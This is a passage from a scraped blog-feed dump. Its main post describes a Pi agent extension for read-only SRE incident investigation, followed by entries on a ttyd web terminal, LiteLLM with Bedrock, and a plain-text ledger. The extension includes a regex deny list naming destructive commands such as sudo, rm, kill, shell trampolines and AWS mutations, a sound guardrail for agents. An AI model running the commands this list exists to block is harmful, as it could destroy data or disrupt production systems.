next to the real tools. 
Pi gave me that, and the specific SDK primitives it exposes turned out to map almost 1:1 to what I had been building by hand in llmduck.\nA session looks like this:\n\u002Fcheck-connectors\n\u002Fincident\ninvestigate elevated p99 latency for payments-api, start with a timeline\n\u002Freport\n\u002Fincident – an interactive wizard: pick a template, name the service, set a time window\n\u002Fcheck-connectors – verifies your infrastructure CLIs are reachable\n\u002Freport – generates a structured postmortem from the investigation\n\u002Fsudo – temporarily bypasses the read-only guardrails\nHow It Works\nPi extensions are TypeScript modules that receive an ExtensionAPI object – hooks into the agent lifecycle, slash commands, session state, shell execution, UI primitives, and an inter-extension event bus. The whole extension is one file and the rest is markdown.\nThe SDK has a few primitives that matter here:\nCarrying context across the conversation\nThe before_agent_start hook fires before every agent turn. The extension builds a context block from the current incident state and appends it to the system prompt:\npi.on(\"before_agent_start\", (event) => {\n  return { systemPrompt: `${event.systemPrompt}\\n\\n${incidentContext}` };\n});\nTemplate, service name, time window, guardrail posture, overlay guidance, preferred skills – all injected automatically. You do not need to keep re-explaining “payments API, last 2 hours, high latency, read-only.” It follows you.\nBlocking mutations before they execute\nThe tool_call hook intercepts every tool invocation before execution:\npi.on(\"tool_call\", async (event) => {\n  const reason = getGuardrailBlockReason(event.toolName, event.input);\n  if (reason) return { block: true, reason };\n});\nThe guardrail implementation is regex-based with token boundary detection:\nconst BLOCKED_PATTERNS = [\n  { pattern: \u002Fsudo\u002F, reason: \"sudo blocked\" },\n  { pattern: \u002Frm\u002F, reason: \"file deletion blocked\" },\n  { pattern: \u002Fkill|pkill|killall\u002F, reason: \"process termination blocked\" },\n  { pattern: \u002Fbash\\s+-c|sh\\s+-c|zsh\\s+-c\u002F, reason: \"shell trampoline blocked\" },\n  { pattern: \u002Feval\u002F, reason: \"eval blocked\" },\n  { pattern: \u002F\\$\\(\u002F, reason: \"subshell blocked\" },\n  { pattern: \u002Fsystemctl\\s+(restart|stop|start)\u002F, reason: \"systemctl mutation blocked\" },\n  { pattern: \u002Faws\\s+.*\\s+(create|delete|update|put|run|start|stop|terminate|reboot)\u002F,\n    reason: \"AWS mutation blocked\" },\n];\nThe token boundary prevents false positives – remove does not match the rm rule. The write and edit tools are unconditionally blocked. \u002Fsudo disables this when needed.\nPersisting incident state\nPi sessions are tree-structured – you can fork, navigate branches, switch contexts. Incident state is persisted as append-only entries:\npi.appendEntry\u003CIncidentModeState>(\"incident-mode-state\", state);\nThe extension hooks into session_tree and session_fork events to carry incident state across branches automatically. If you fork to explore a side hypothesis, the incident context comes with you.\nCommands and UI\npi.registerCommand() handles slash commands. The \u002Fincident wizard uses ctx.ui.select() and ctx.ui.input() for interactive setup – template selection, service name, time window. pi.exec() runs shell commands for connector checks.
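\nStitched together, a trimmed \u002Fincident registration might look roughly like this (a sketch: the names above come from the SDK as described, but the exact signatures are my assumption):\npi.registerCommand(\"incident\", async (ctx) => {\n  \u002F\u002F Wizard steps: template, service, time window.\n  const template = await ctx.ui.select(\"Incident template\", [\"5xx spike\", \"High latency\", \"OOM crash loop\"]);\n  const service = await ctx.ui.input(\"Service name\");\n  const timeWindow = await ctx.ui.input(\"Time window, e.g. last 2h\");\n  \u002F\u002F Persist as an append-only entry so forked branches inherit it.\n  pi.appendEntry\u003CIncidentModeState>(\"incident-mode-state\", { template, service, timeWindow });\n});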
\nInter-extension events\nPi has an in-process event bus (pi.events) for cross-package communication – same JS runtime, no network, just pub\u002Fsub between extensions loaded from different npm packages. The base package subscribes to a channel, the overlay emits to it at session start. The decoupling is at the import level, not the process level. More on this below.\nTemplates and Skills\nMost incidents fall into a handful of patterns – 5xx spike, high latency, OOM crash loop, deploy regression, service down. Each pattern has a different starting point: for latency you want percentile breakdowns and dependency response times first; for OOMs you want restart history and memory growth; for a deploy regression you want a before\u002Fafter comparison.\nTemplates encode that. When you pick “High Latency” in the \u002Fincident wizard, the system prompt gets a focused directive: check p50\u002Fp95\u002Fp99, look for saturation signals, check upstream dependencies, identify whether queueing is involved. The model starts in the right place instead of flailing. You can also skip the wizard entirely – \u002Fincident-5xx payments-api last 2h sets up the investigation directly.\nThe investigation methodology itself lives in skills – markdown files that get loaded into context:\n---\nname: sre-methodology\nallowed-tools: [Read, Bash, Grep]\n---\n\n## Core Loop\n\n1. **Observe**: Gather data. Metrics, logs, scheduler state.\n2. **Hypothesize**: Form a theory from the evidence.\n3. **Test**: Run a specific query that would confirm or disprove.\n4. **Evaluate**: Did the evidence match? Adjust and repeat.\nThe base package includes two skills: an observe-hypothesize-test-evaluate loop with first principles (evidence over speculation, build timeline before concluding, the loudest symptom is often downstream), and a concrete investigation playbook (scope the blast radius, check recent changes, follow the service path from edge to dependency, narrow using the template focus).\nWithout the methodology, the model tends to jump to conclusions or fixate on the noisiest symptom. With it, investigations are more systematic.\nThe Overlay System\nThe public package is intentionally generic. The real leverage comes from overlays – private Pi packages that layer org-specific knowledge on top.\nAn overlay is a separate Pi package that emits an event at session start. The base package picks it up and merges it into the active configuration – templates, connector checks, skills, timezone hints, report output paths:\nexport default function myOrgOverlay(pi: ExtensionAPI) {\n  const overlay: IncidentOverlay = {\n    id: \"my-org\",\n    priority: 100,\n    timezoneHint: \"IST (UTC+5:30); metrics are UTC, logs are IST.\",\n    reportPathPattern: \"rca\u002F{{date}}-{{slug}}.md\",\n    defaultSkills: [\"org-sre-methodology\"],\n    promptPreamble: \"Use org service topology, strict timezone handling...\",\n    connectorChecks: [ \u002F* ... *\u002F ],\n    templates: [ \u002F* ... *\u002F ],\n  };\n\n  pi.on(\"session_start\", () => {\n    pi.emit(\"incident-mode:register-overlay\", overlay);\n  });\n}\nTemplates merge by ID (overlay wins). Skills are deduplicated. Prompt preambles stack across overlays.
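\nConceptually, the merge is small enough to sketch (illustrative TypeScript, not the package’s actual code; IncidentConfig is a made-up name for the active configuration):\nfunction mergeOverlays(base: IncidentConfig, overlays: IncidentOverlay[]): IncidentConfig {\n  const byPriority = [...overlays].sort((a, b) => a.priority - b.priority);\n  const templates = new Map(base.templates.map((t): [string, typeof t] => [t.id, t]));\n  const skills = new Set(base.defaultSkills);\n  let preamble = base.promptPreamble ?? \"\";\n  for (const o of byPriority) {\n    for (const t of o.templates ?? []) templates.set(t.id, t); \u002F\u002F merge by ID, overlay wins\n    for (const s of o.defaultSkills ?? []) skills.add(s); \u002F\u002F the Set deduplicates skills\n    if (o.promptPreamble) preamble += \"\\n\" + o.promptPreamble; \u002F\u002F preambles stack\n  }\n  return { ...base, templates: [...templates.values()], defaultSkills: [...skills], promptPreamble: preamble };\n}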
\nWhat an Overlay Adds\nAt work, my private overlay adds investigation templates tied to specific services and a few thousand lines of operational knowledge as skills – how to query our metrics stack, how to read our logs, how to interpret scheduler state, and how to write the postmortem.\nThe interesting part is what those skills encode. Not just CLI syntax, but the gotchas you learn the hard way: timezone mismatches between tools, CPU metrics that mean something different depending on allocation config, log columns that don’t exist where you’d expect them, query patterns that accidentally match unrelated data. A failure pattern library teaches the model to recognize cascading failures, throughput cliffs (silence often means blocked, not recovered), and the difference between a root cause and a downstream symptom.\nThis is the kind of institutional knowledge that normally lives in someone’s head or a stale wiki page. Encoding it as skills means it gets applied consistently during every investigation.\nEvery team has different tools, naming conventions, auth assumptions, and definitions of “normal.” Mix that into the base package and you either leak private knowledge or make the tool unusably abstract. The overlay keeps them cleanly separated.\nWhat the LLM Is Actually Good At\nThis is not an “AI will run your ops team” post. The model does not do triage or make mitigation calls. What it does well is the stuff that eats wall-clock time:\nGathering and cross-referencing evidence\nThe model does not stop at “good enough.” If you ask it to investigate a latency spike, it will check p50\u002Fp95\u002Fp99, break it down per node, compare against the pre-deploy baseline, look at upstream dependency latency, check if the error rate moved with it, and then go look at logs for the time window where the percentiles diverged.\nBuilding timelines from messy evidence\nThe model is good at stitching together outputs from different tools – logs in IST, metrics in UTC, a deploy at some offset, a scheduler restart in the middle, a cloud instance termination, a queue backup two minutes later – into a coherent narrative. It can produce a first-pass timeline like “memory growth started after deploy X, restart happened 14 minutes later, error rate rose only on one node, autoscaling replaced the sick instance, and downstream proxy alerts were a secondary symptom” faster than I can by hand.\nProducing a first draft of the postmortem\nThe postmortem is hardest to write right after the incident, precisely when it is most valuable. If the investigation happened inside Pi, \u002Freport turns the conversation into a structured markdown RCA draft immediately – timeline, 5 Whys, impact, action items. That alone saves a lot of the “I’ll write the postmortem tomorrow” drift.\nKeeping the investigation disciplined\nThe methodology skills help the model stay in evidence-first mode: observe before hypothesizing, build a timeline before concluding, distinguish cause from effect, state uncertainty explicitly, say when a connector is missing instead of guessing. Without this, the model tends to fixate on the noisiest symptom. With it, investigations follow an observe-hypothesize-test-evaluate loop.\nWhere It Still Fails\nGuardrails are not a sandbox\nThe read-only protections are operational guardrails, not security boundaries. They catch accidental mutations during investigation, but they are regex patterns – not a sandbox. The real defense is least-privilege at the infrastructure level: an AWS IAM role scoped to read-only, a metrics API token without write access, an SSH key that can only reach jump hosts. If the credentials the agent has cannot mutate anything, it does not matter if a guardrail regex gets bypassed.
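\nFor the AWS piece, that read-only scoping is just an IAM policy. A minimal sketch (the action list is illustrative; trim it to the services you actually investigate):\n{\n  \"Version\": \"2012-10-17\",\n  \"Statement\": [\n    {\n      \"Sid\": \"InvestigationReadOnly\",\n      \"Effect\": \"Allow\",\n      \"Action\": [\n        \"cloudwatch:Get*\",\n        \"cloudwatch:List*\",\n        \"logs:Describe*\",\n        \"logs:Get*\",\n        \"logs:FilterLogEvents\",\n        \"ec2:Describe*\",\n        \"autoscaling:Describe*\"\n      ],\n      \"Resource\": \"*\"\n    }\n  ]\n}\nNo write actions anywhere: even a fully bypassed guardrail can only read.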
\nThe model can still hallucinate\nIt will sometimes invent a metric name, over-index on a noisy symptom, or keep running commands when the evidence is already sufficient. Good skills help but do not make it reliable enough to trust unattended.\nThe Bigger Lesson\nI spent weeks building and rebuilding a custom agent platform. Rewrote it twice in different languages. All plumbing. The things that actually made the investigations good were:\nthe SRE methodology skill that encoded how to think about incidents\nthe failure pattern library that taught the model to recognize cascade failures and throughput cliffs\nthe per-tool skills that encoded gotchas like “that CPU metric means something different in a cgroup” and “silence in the logs means blocked, not recovered”\nthe templates that seeded the investigation direction\nthe guardrails that kept the model from accidentally mutating production\nAll of those are markdown files and a few dozen regex patterns. I kept building runtime to deliver content. Once I had a platform that could host markdown skills and intercept tool calls, the custom stack had no reason to exist.\nThe code is at github.com\u002Fmr-karan\u002Fpi-sre-mode.\nFin!",[],"Karan Sharma","mr-karan","\u002Fimages\u002Fmr-karan_photo.jpg","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fatom.xml",{"slug":99,"title":100,"link":101,"pubDate":102,"contentSnippet":103,"tags":104,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"eengum-marakkanrugal","Saplings Everywhere","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2026\u002F03\u002F08\u002Feengum-marakkanrugal\u002F","Sun, 08 Mar 2026 18:00:43 +0000","At a sapling-distribution event, the saplings looked at me and asked: why are you just standing there? Take one of us along, they said. I do have the heart to raise saplings, but how do I make them understand that there is no space at home!
.",[67,105],"quotes",{"slug":107,"title":108,"link":109,"pubDate":110,"contentSnippet":111,"tags":112,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"web-terminal-homelab","A Web Terminal for My Homelab with ttyd + tmux","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fweb-terminal-homelab\u002F","2026-03-05T00:00:00.000Z","I wanted a browser terminal at terminal.mrkaran.dev that works from laptop, tablet, and phone without special client setup.\nThe stack that works cleanly for this is ttyd + tmux.\nArchitecture#\nBrowser -> Caddy -> ttyd -> nsenter -> su - karan -> tmux(main)\nTwo decisions matter most:\nttyd handles terminal-over-websocket behavior well.\n-m 1 enforces a single active client, which avoids cross-tab resize contention.\nDocker Compose (current)#\nservices:\n  webterm:\n    image: tsl0922\u002Fttyd\n    container_name: webterm\n    restart: unless-stopped\n    command: >\n      ttyd\n        -W\n        -p 8080\n        -m 1\n        nsenter\n        -t 1\n        -m -u -i -p\n        --\n        su - karan -c\n        \"tmux new-session -A -s main\"\n    privileged: true\n    pid: \"host\"\n    networks:\n      - public_proxy\nWhy each flag matters:\n-W: writable shell\n-p 8080: matches my existing Caddy upstream (webterm:8080)\n-m 1: one active client only (no resize fight club)\nnsenter ...: real host shell from inside the container\nsu - karan: correct login environment and tmux config loading\ntmux new-session -A -s main: persistent attach\u002Fre-attach\nCaddy#\nterminal.mrkaran.dev reverse proxies to webterm:8080 with TLS via Cloudflare DNS challenge.\nBecause ttyd uses WebSockets heavily, reverse proxy support for upgrades is essential.\ntmux profile for agentic workflows#\nI tuned tmux for long-running agent sessions, not just manual shell use.\nLong-run defaults#\nhistory-limit 200000\nremain-on-exit on\nwindow-size latest\nmode-keys vi \u002F status-keys vi\nBetter operational visibility#\nstatus line shows host + session + path + time\npane border shows pane number + current command\nactive pane is clearly highlighted\nKeybinds I actually use#\nPrefix: Ctrl-b\nS: create\u002Fattach named session\nN: create named window\nR: rename window\ns: session\u002Fwindow picker\ny: toggle synchronize-panes\nh\u002Fj\u002Fk\u002Fl: pane movement\nH\u002FJ\u002FK\u002FL: pane resize\nCopy\u002Fpaste that is not annoying#\nThis was a big pain point, so I added both workflows:\nBrowser-native copy\nCtrl-b m to turn tmux mouse off\ndrag-select + browser copy shortcut\nCtrl-b m to turn tmux mouse back on\ntmux copy mode\nCtrl-b [ enters copy mode and shows COPY MODE ON\nv select, y copy (shows Copied selection)\nq or Esc exits (shows COPY MODE OFF)\nOn mobile, ttyd’s top-left menu (special keys) makes prefix navigation workable.\nSecurity model#\nThis is tailnet-only behind Tailscale. 
\ntmux profile for agentic workflows\nI tuned tmux for long-running agent sessions, not just manual shell use.\nLong-run defaults\nhistory-limit 200000\nremain-on-exit on\nwindow-size latest\nmode-keys vi \u002F status-keys vi\nBetter operational visibility\nstatus line shows host + session + path + time\npane border shows pane number + current command\nactive pane is clearly highlighted\nKeybinds I actually use\nPrefix: Ctrl-b\nS: create\u002Fattach named session\nN: create named window\nR: rename window\ns: session\u002Fwindow picker\ny: toggle synchronize-panes\nh\u002Fj\u002Fk\u002Fl: pane movement\nH\u002FJ\u002FK\u002FL: pane resize\nCopy\u002Fpaste that is not annoying\nThis was a big pain point, so I added both workflows:\nBrowser-native copy\nCtrl-b m to turn tmux mouse off\ndrag-select + browser copy shortcut\nCtrl-b m to turn tmux mouse back on\ntmux copy mode\nCtrl-b [ enters copy mode and shows COPY MODE ON\nv select, y copy (shows Copied selection)\nq or Esc exits (shows COPY MODE OFF)\nOn mobile, ttyd’s top-left menu (special keys) makes prefix navigation workable.\nSecurity model\nThis is tailnet-only behind Tailscale. No public exposure.\nStill, the container has privileged: true and pid: host, which crosses a strong trust boundary.\nIf you expose anything like this publicly, add auth in front and treat it as high-risk infrastructure.\nResult\n\nThe terminal is now boring in the best way: stable, predictable, and fast to reach from any device.",[],{"slug":114,"title":115,"link":116,"pubDate":117,"contentSnippet":77,"tags":118,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"vectorbt-ai-skills-to-build-and-backtest-trading-strategies-faster-without-writing-a-single-line-of-","VectorBT AI Skills to Build and Backtest Trading Strategies Faster Without Writing a Single Line of…","https:\u002F\u002Fopenalgo.medium.com\u002Fvectorbt-ai-skills-to-build-and-backtest-trading-strategies-faster-without-writing-a-single-line-of-b8d5418e2088?source=rss-cda86e929c3------2","Mon, 02 Mar 2026 03:47:20 GMT",[81,119,120,121,122],"ai-skills","yfinance","vectorbt","backtesting",{"slug":124,"title":125,"link":126,"pubDate":127,"contentSnippet":128,"tags":129,"maintainerName":130,"maintainerUsername":131,"maintainerPhoto":132,"feedUrl":133},"submission-dtf-bill-2026","Technical Submission on India’s Digital Trade Facilitation Bill, 2026","https:\u002F\u002Fwww.divyamohan.com\u002Fsubmission-dtf-bill-2026\u002F","Wed, 25 Feb 2026 03:08:48 GMT","Introduction\nA sizeable portion of the Indian and global tech ecosystem was gathered at the India AI Impact Summit in New Delhi last week. While I missed attending it due to personal reasons, as an open source maintainer and an alumnus of The Takshashila Institution's GCPP",[],"Divya Mohan","divya-mohan0209","\u002Fimages\u002Fdivya-mohan0209_photo.png","https:\u002F\u002Fwww.divyamohan.com\u002Frss",{"slug":135,"title":136,"link":137,"pubDate":138,"contentSnippet":139,"tags":140,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"litellm-bedrock-setup","Setting Up LiteLLM with AWS Bedrock","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Flitellm-bedrock-setup\u002F","2026-02-16T00:00:00.000Z","I recently set up LiteLLM with AWS Bedrock as the LLM provider. The docs cover the happy path, but there are a few gotchas that cost me some debugging time. This post covers what I learned, from basic setup to per-project cost tracking with Application Inference Profiles.\nModel Format\nBedrock models use the bedrock\u002F prefix followed by AWS’s model identifiers:\nbedrock\u002Fanthropic.claude-opus-4-6-v1\nbedrock\u002Fanthropic.claude-sonnet-4-5-20250929-v1:0\nNothing surprising here. LiteLLM uses the prefix to route to the right provider.\nAuthentication\nThis is where the first gotcha lives. Bedrock doesn’t use API keys. It authenticates via standard AWS credentials:\nEnvironment variables: AWS_ACCESS_KEY_ID + AWS_SECRET_ACCESS_KEY\nAWS profile: AWS_PROFILE\nIAM role (for EC2\u002FECS\u002FLambda)\nYou also need AWS_REGION_NAME set to the region where Bedrock is enabled (e.g., ap-south-1).\nThe gotcha: don’t pass api_key to LiteLLM when using Bedrock. If you include an api_key parameter in your config, LiteLLM tries to use it instead of the AWS credential chain and auth fails silently. 
You need to either return None for the API key or omit it from the config entirely.\n# Wrong - breaks AWS credential chain\nllm_config = {\"model\": \"bedrock\u002Fanthropic.claude-opus-4-6-v1\", \"api_key\": some_key}\n\n# Correct - let LiteLLM use AWS credentials\nllm_config = {\"model\": \"bedrock\u002Fanthropic.claude-opus-4-6-v1\"}\nThis one took a while to figure out because the error messages don’t point you in the right direction.\nThe top_p and Temperature Conflict\nBedrock’s Anthropic models reject requests that include both temperature and top_p. If your SDK or framework defaults top_p=1.0, you need to explicitly clear it:\nif model.startswith(\"bedrock\u002F\"):\n    llm_config[\"top_p\"] = None\nWithout this, you’ll get a validation error from the Bedrock API. The fix is simple, but the error message isn’t immediately obvious about what’s conflicting.\nInference Profiles\nBedrock has two types of inference profiles, and the second one is where things get interesting for cost management.\nCross-Region (System-Defined)\nAWS provides these out of the box. They route requests across regions for higher throughput and availability:\nglobal.anthropic.claude-opus-4-6-v1\nYou can list them with:\naws bedrock list-inference-profiles \\\n  --type-equals SYSTEM_DEFINED \\\n  --region ap-south-1\nApplication Inference Profiles for Cost Tracking\nApplication Inference Profiles (AIPs) are tagged wrappers around a model. The killer use case is granular cost attribution via cost allocation tags. Instead of seeing one blob of “Bedrock spend” in your AWS bill, you can break it down by project, team, or service.\nCreate one with:\naws bedrock create-inference-profile \\\n  --inference-profile-name my-project-opus-4-6 \\\n  --model-source \"copyFrom=arn:aws:bedrock:ap-south-1::foundation-model\u002Fanthropic.claude-opus-4-6-v1:0\" \\\n  --tags key=project,value=my-project \\\n  --region ap-south-1\nThis gives you an ARN like:\narn:aws:bedrock:ap-south-1:123456789012:application-inference-profile\u002Fabcdef123456\nUsing AIPs with LiteLLM\nThe standard bedrock\u002F route can’t parse ARNs. Use the bedrock\u002Fconverse\u002F route instead:\nbedrock\u002Fconverse\u002Farn:aws:bedrock:ap-south-1:123456789012:application-inference-profile\u002Fabcdef123456\nThe bedrock\u002F prefix still matches for provider detection and the top_p=None fix, so no code changes are needed on your end.
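\nTo sanity-check the whole chain, a minimal call through the AIP looks something like this (a sketch; the ARN is the example one from above):\nfrom litellm import completion\n\n# No api_key on purpose - Bedrock auth rides on the AWS credential chain.\nresponse = completion(\n    model=\"bedrock\u002Fconverse\u002Farn:aws:bedrock:ap-south-1:123456789012:application-inference-profile\u002Fabcdef123456\",\n    messages=[{\"role\": \"user\", \"content\": \"ping\"}],\n)\nprint(response.choices[0].message.content)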
All invocations through it get tagged automatically.\nIn Cost Explorer, group by tag and select your tag key to see the per-project breakdown.\nCost data takes ~24 hours to populate after first usage, so don’t panic if it shows up empty initially.\nDependencies#\nLiteLLM needs boto3 to talk to Bedrock:\nboto3>=1.28.57\nMake sure it’s installed in your environment; otherwise, LiteLLM will fail with an import error when you try to use the bedrock\u002F provider.\nFin!",[],{"slug":142,"title":143,"link":144,"pubDate":145,"contentSnippet":146,"tags":147,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"your-true-nature","Your True Nature","https:\u002F\u002Fwww.prashanthudupa.com\u002Fyour-true-nature\u002F","Sat, 14 Feb 2026 05:30:43 +0000","When you just watch what’s going on with your seeing, hearing, smelling, tasting, touching, thoughting, feeling and your body-mind in general — it becomes very clear that you are not the things you see, the sounds you hear, the smells you smell, the tastes you taste, the objects you touch, or the body you have, […]",[148,149],{"slug":155,"title":156,"link":157,"pubDate":158,"contentSnippet":77,"tags":159,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"signal-half-life-the-missing-piece-in-most-trading-systems-24824b102799","Signal Half-Life: The Missing Piece in Most Trading Systems","https:\u002F\u002Fopenalgo.medium.com\u002Fsignal-half-life-the-missing-piece-in-most-trading-systems-24824b102799?source=rss-cda86e929c3------2","Thu, 12 Feb 2026 16:58:50 GMT",[160,161,162,163,164],"trading-system","trading-strategy","market-timing","trading-signals","trading-psychology",{"slug":166,"title":167,"link":168,"pubDate":169,"contentSnippet":170,"tags":171,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"empty-space-infinite-forms","Empty Space, Infinite Forms","https:\u002F\u002Fwww.prashanthudupa.com\u002Fempty-space-infinite-forms\u002F","Wed, 11 Feb 2026 16:27:18 +0000","When I started just looking at what’s going on, I first noticed the cyclic nature of all phenomena. Just about everything had a beginning, middle, and end. Whether it was breath, or heartbeat, or thought, or feeling, or a sound, or any other sensation for that matter. It seemed like life was just a stream […]",[148,149],{"slug":173,"title":174,"link":175,"pubDate":176,"contentSnippet":177,"tags":178,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"gullak-ledger","Why Plain-Text Ledger is Powerful for Gullak","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fgullak-ledger\u002F","2026-02-02T00:00:00.000Z","In my previous post, I introduced Gullak, an expense tracker I built to categorize transactions using LLMs. While the initial prototype used SQLite, I’ve since made a fundamental shift in how Gullak stores data. It now uses the ledger-cli format—a plain-text accounting standard that has been around for over 20 years.\nThe Core Insight#\nLedger-cli uses a format that is, at its core, just text files. There are no database migrations to manage, no proprietary binary formats, and absolutely no vendor lock-in.
The promise is simple: your financial data should outlive the application you use to track it.\nHackability in Gullak’s Context#\nMoving to a plain-text format unlocked several advantages that align perfectly with modern AI capabilities and the Unix philosophy.\n1. AI-Native Format#\nConsider a typical transaction entry in a ledger file:\n2026\u002F01\u002F21 Swiggy\n    Expenses:Food:Delivery  584.23 INR\n    Liabilities:CreditCard:ICICI  -584.23 INR\nThis structure is trivially parseable by Large Language Models (LLMs). An AI agent can read, write, and reason about these transactions without needing complex serialization logic. Compare this to the friction of extracting data from a SQLite blob or interfacing with a proprietary API like Splitwise’s. The text is the interface.\n2. Git-Friendly#\nBecause every transaction is just a few lines of text, your financial history becomes a git repository. Every change is a diff.\nThis gives you:\nFull audit trail: git log -p -- main.ledger shows exactly what changed and when.\nEasy rollback: Made a mistake? git revert.\n“What-if” scenarios: Branch off to model a major purchase or a different budget strategy.\nCollaboration: Family budgeting can be handled via Pull Requests.\n3. Unix Philosophy#\nThe file serves as the API. You don’t need export buttons or data liberation requests. You can use standard Unix tools to query your finances.\nFind all Swiggy orders over 500 INR:\ngrep -A2 \"Swiggy\" main.ledger | grep -E \"[5-9][0-9]{2,}|[0-9]{4,}\"\nCheck your monthly food spending:\nledger -f main.ledger bal Expenses:Food -p \"this month\"\nExport to CSV for Google Sheets:\nledger -f main.ledger csv Expenses\n4. Extensibility via Comments#\nGullak adds its own metadata using standard ledger comments, which are ignored by the accounting tools but used by the app:\n2026\u002F01\u002F21 Zomato\n    ; gullak:id 7559a51f\n    ; gullak:source whatsapp\n    ; gullak:user 919876543210\n    Expenses:Food:Delivery  584.23 INR\ngullak:id: A unique ID for CRUD operations.\ngullak:source: Provenance tracking (e.g., entered via WhatsApp, web, or CSV).\ngullak:user: Multi-user support.\nCustom tags for your own organization—like ; Recurring: Netflix—just work out of the box.\n5. Ecosystem Interoperability#\nBecause the format is standard, Gullak plays nice with others:\nPaisa: Reads the same file for beautiful visualizations.\nhledger: A Haskell alternative that is drop-in compatible.\nBeancount: Can import ledger files.\nText Editors: Any editor (VS Code, Vim, Sublime) is a valid client.\nWhat This Enables#\nHow plain text helps, feature by feature:\nWhatsApp logging: AI parses “swiggy 500” → appends text to file\nReceipt OCR: Extract data → format as ledger → append\nBank CSV import: Transform CSV → ledger format → append\nTransaction editing: Find by gullak:id → text replacement\nUndo\u002Fhistory: Git handles it for free\nBackup: cp main.ledger backup.ledger\nMigration: It’s text. There’s nothing to migrate.\n\nThe Trade-off#\nOf course, you lose ACID transactions, database indexes, and complex SQL queries. But for personal finance, the scale makes these trade-offs irrelevant.\nYou likely have 10-50 transactions a month.\nRunning ledger bal on 10 years of data takes less than 100ms.\nThe simplicity is the feature.\nConclusion#\nAdopting the ledger format turns Gullak from “yet another expense app” into a thin AI layer over your permanent financial record.
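To make that concrete, here is a minimal sketch of the append path (a hypothetical helper, not Gullak’s actual code):\nfrom datetime import date\n\ndef append_transaction(path, payee, account, amount, txn_id, source, user):\n    # The file is the API: recording an expense is just appending text.\n    entry = f\"\"\"{date.today():%Y\u002F%m\u002F%d} {payee}\n    ; gullak:id {txn_id}\n    ; gullak:source {source}\n    ; gullak:user {user}\n    Expenses:{account}  {amount:.2f} INR\n    Liabilities:CreditCard:ICICI  {-amount:.2f} INR\n\n\"\"\"\n    with open(path, \"a\") as f:\n        f.write(entry)\n\nappend_transaction(\"main.ledger\", \"Swiggy\", \"Food:Delivery\",\n                   584.23, \"7559a51f\", \"whatsapp\", \"919876543210\")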
By decoupling the data from the application logic, we ensure that the data remains accessible, hackable, and enduring.",[],{"slug":180,"title":181,"link":182,"pubDate":183,"contentSnippet":77,"tags":184,"maintainerName":84,"maintainerUsername":85,"maintainerPhoto":77,"feedUrl":86},"automating-trading-with-openalgo-and-openclaw-de55cc2b2d63","Automating Trading with OpenAlgo and OpenClaw","https:\u002F\u002Fopenalgo.medium.com\u002Fautomating-trading-with-openalgo-and-openclaw-de55cc2b2d63?source=rss-cda86e929c3------2","Sun, 01 Feb 2026 09:48:01 GMT",[185,81,186,82,187],"clawdbot","openclaw","automated-trading",{"slug":189,"title":190,"link":191,"pubDate":192,"contentSnippet":193,"tags":194,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"plain-text-future","CLIs are the New AI Interfaces","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fplain-text-future\u002F","2026-01-31T00:00:00.000Z","The industry is currently obsessed with defining standards for how Large Language Models (LLMs) should interact with software. We see a proliferation of SDKs, function calling schemas, and protocols like MCP (Model Context Protocol). They all aim to solve the same problem: bridging the gap between natural language intent and deterministic code execution.\nBut we might be reinventing the wheel.\nThe most effective tools for AI agents aren’t those wrapped in heavy “AI-native” integration layers. They are the tools that adhere to a philosophy established forty years ago: the command-line interface.\nThe Unix Philosophy as an AI Protocol#\nAn LLM’s native tongue is text. It reasons in tokens, generates strings, and parses patterns. The Unix philosophy, which emphasizes small tools, plain text interfaces, and standard streams, is accidentally the perfect protocol for AI interaction.\nConsider the anatomy of a well-behaved CLI:\nDiscovery: tool --help explains capabilities without hallucination.\nStructure: tool --json provides deterministic output for parsing.\nComposition: Pipes (|) allow complex workflows to be assembled on the fly.\nWhen you give an agent access to a robust CLI, you don’t need to define 50 separate function schemas. You give it a shell and a single instruction: “Figure it out using --help.”\nContext Economy: Lazy vs. Eager Loading#\nThe current approach to agent tooling often involves dumping massive JSON schemas into the context window. Connecting to a standard MCP server might load dozens of tool definitions, involving thousands of tokens describing every possible parameter, before the user has even asked a question. This is “eager loading,” and it is expensive in terms of both latency and context window utilization.\nA CLI-driven approach is “lazy loaded.”\nThe agent starts with zero knowledge of the tool’s internals. It burns zero tokens on schema definitions. Only when tasked with a specific goal does it invoke man or --help. It retrieves exactly the information needed to construct the command, executes it, and parses the result. This reflects the professional intuition of a senior engineer. We rarely memorize documentation. Instead, we prioritize the ability to quickly discover and apply the specific flags required for the task at hand.\nLeveraging the Skills Pattern#\nTo bridge the gap between a raw CLI and an agent’s reasoning, we can leverage the Skills pattern. 
This is an emerging standard for agent-based systems where capabilities are documented as self-contained units of knowledge.\nInstead of writing a Python wrapper that maps an API to a function call, you provide a Markdown file that explains when and why to use a specific CLI command. The agent uses this as a semantic index.\nHere is a snippet from a logchef.md skill:\n---\nname: logchef\ndescription: Query application logs via LogChef CLI. Use for investigating production incidents and analyzing traffic patterns.\n---\n\n## Common Workflows\n\n| Goal           | Command Pattern       |\n| -------------- | --------------------- |\n| Error Analysis | `logchef sql \"...\"`   |\n| Live Tail      | `logchef query '...'` |\n\n## Example: Error Rates by Minute\n\nTo visualize error spikes, use aggregation:\n\n```sql\nlogchef sql \"SELECT toStartOfMinute(_timestamp) as ts, count() as errors\nFROM logs.app_logs WHERE service='api-gateway' AND level='ERROR'\nGROUP BY ts ORDER BY ts DESC LIMIT 60\" --output json\n```\n\nWhen I ask an agent to “check for error spikes in the API gateway,” Claude identifies that this skill is relevant to the request and loads it on-demand. It sees the example, adapts the SQL query to the current context, and executes the CLI command. The 